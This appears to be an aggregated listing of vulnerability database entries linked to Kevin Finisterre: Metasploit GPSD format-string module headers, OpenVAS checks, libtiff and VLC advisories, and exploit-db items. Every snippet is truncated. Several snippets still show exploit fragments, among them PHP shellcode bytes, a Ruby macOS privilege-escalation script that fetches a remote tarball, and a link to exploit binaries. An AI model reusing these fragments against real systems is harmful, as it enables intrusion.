Berlios GPSD Format String Vulnerability
No description provided by source. $Id: gpsdformatstring.rb 9179 2010-04-30 08:40:19Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of...
Berlios GPSD 1.91-1 - 2.7-2 - Format String Vulnerability
No description provided by source. require 'msf/core' class Metasploit3 Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initializeinfo = superupdateinfoinfo, 'Name' = 'Berlios GPSD Format String Vulnerability', 'Description' = %q This module exploits a format string vulnerability in th...
RedHat Update for libtiff RHSA-2010:0520-01
Check for the Version of libtiff OpenVAS Vulnerability Test RedHat Update for libtiff RHSA-2010:0520-01 Authors: System Generated Check Copyright: Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the...
RedHat Update for libtiff RHSA-2010:0519-01
Check for the Version of libtiff OpenVAS Vulnerability Test RedHat Update for libtiff RHSA-2010:0519-01 Authors: System Generated Check Copyright: Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the...
Ubuntu Update for tiff vulnerabilities USN-954-1
Ubuntu Update for Linux kernel vulnerabilities USN-954-1 OpenVAS Vulnerability Test $Id: gbubuntuUSN9541.nasl 7965 2017-12-01 07:38:25Z santu $ Ubuntu Update for tiff vulnerabilities USN-954-1 Authors: System Generated Check Copyright: Copyright (c) 2010 Greenbone Networks GmbH,...
Ubuntu 6.06 LTS / 8.04 LTS / 9.04 / 9.10 / 10.04 LTS : tiff vulnerabilities (USN-954-1)
Kevin Finisterre discovered that the TIFF library did not correctly handle certain image structures. If a user or automated system were tricked into opening a specially crafted TIFF image, a remote attacker could execute arbitrary code with user privileges, or crash the application, leading to a...
Berlios GPSD - Format String (Metasploit)
$Id: gpsdformatstring.rb 9179 2010-04-30 08:40:19Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...
tiff -- buffer overflow vulnerability
Kevin Finisterre reports: Multiple integer overflows in the handling of TIFF files may result in a heap buffer overflow. Opening a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution. The issues are addressed through improved bounds checking...
Berlios GPSD Format String Vulnerability
This module exploits a format string vulnerability in the Berlios GPSD server. This vulnerability was discovered by Kevin Finisterre. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Berlios GPS...
Apple QuickTime 7.2/7.3 (OSX/Windows) - RSTP Response Universal
Apple QuickTime 7.2/7.3 (OSX/Windows) - RSTP Response Universal Copyright (C) 2007 Subreption LLC. All rights reserved. Visit http://blog.subreption.com for exploit development notes. References: http://www.milw0rm.com/exploits/4648 (original Microsoft Windows code) http://www.milw0rm.com/exploits/4651...
php523browse-overflow.txt
7ffdf020 7c911005 7c9110ed 00000001 00000000 shoutz go to Kevin Finisterre / if!functionexists'winbrowsefile' die'win32std extension is not available'; $shellcode= "\x2b\xc9\xb1\x51\xba\xbb\xb2\xd5\x31\xda\xda\xd9\x74\x24\xf4". "\x58\x31\x50\x0e\x83\xc0\x04\x03\xeb\xb8\x37\xc4\xf7\xd7\x5c"...
PHP 5.2.3 - PHP_win32sti Local Buffer Overflow (1)
PHP 5.2.3 - PHPwin32sti Local Buffer Overflow 1 7ffdf020 7c911005 7c9110ed 00000001 00000000 shoutz go to Kevin Finisterre / if!functionexists'winbrowsefile' die'win32std extension is not available'; $shellcode= "\x2b\xc9\xb1\x51\xba\xbb\xb2\xd5\x31\xda\xda\xd9\x74\x24\xf4"...
PHP 5.2.3 - 'PHP_win32sti' Local Buffer Overflow (1)
7ffdf020 7c911005 7c9110ed 00000001 00000000 shoutz go to Kevin Finisterre / if!functionexists'winbrowsefile' die'win32std extension is not available'; $shellcode= "\x2b\xc9\xb1\x51\xba\xbb\xb2\xd5\x31\xda\xda\xd9\x74\x24\xf4". "\x58\x31\x50\x0e\x83\xc0\x04\x03\xeb\xb8\x37\xc4\xf7\xd7\x5c"...
Apple Mac OSX < 2007-005 - 'vpnd' Local Privilege Escalation
Copyright (c) 2007 Kevin Finisterre CVE-ID: CVE-2007-0753 - http://docs.info.apple.com/article.html?artnum=305530 https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4013.tar.gz 05302007-vpenis.tar.gz milw0rm.com 2007-05-30...
GLSA-200701-24 : VLC media player: Format string vulnerability
The remote host is affected by the vulnerability described in GLSA-200701-24 VLC media player: Format string vulnerability Kevin Finisterre has discovered that when handling media locations, various functions throughout VLC media player make improper use of format strings. Impact : An attacker...
DSA-1252-1 vlc
Bulletin has no description...
VLC media player: Format string vulnerability
Background VLC media player is a multimedia player for various audio and video formats. Description Kevin Finisterre has discovered that when handling media locations, various functions throughout VLC media player make improper use of format strings. Impact An attacker could entice a user to open...
Apple Mac OSX 10.4.8 - 'UserNotificationCenter' Local Privilege Escalation
!/usr/bin/ruby Copyright c 2007 Kevin Finisterre Lance M. Havok All pwnage reserved. "Exploit" for MOAB-22-01-2007: All your crash are belong to us. require 'fileutils' bugselected = ARGV0 || 0.toi INPUTMANAGERURL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007im.tar.gz" keeping a...
Apple Mac OSX 10.4.8 - SLP Daemon Service Registration Buffer Overflow (PoC)
!/usr/bin/ruby c Copyright 2006 Lance M. Havok Kevin Finisterre All pwnage reserved. Proof of concept for MOAB-17-01-2007 http://projects.info-pull.com/moab/MOAB-17-01-2007.html Originally reported to Apple by Kevin, on 08/02/2006. require 'socket' targetpath = ARGV0 || '/var/run/slpipc' slpsocke...
berlios.meta.txt
package Msf::Exploit::gpsdformatstring; use base "Msf::Exploit"; use strict; use Pex::Text; use IO::Socket; my $advanced = ; my $info = 'Name' = 'Berlios GPSD Format String Vulnerability', 'Version' = '$ 1.0 $', 'Authors' = 'Enseirb ', , 'Arch' = 'x86' , 'OS' = 'linux' , 'Priv' = 1, 'UserOpts' =...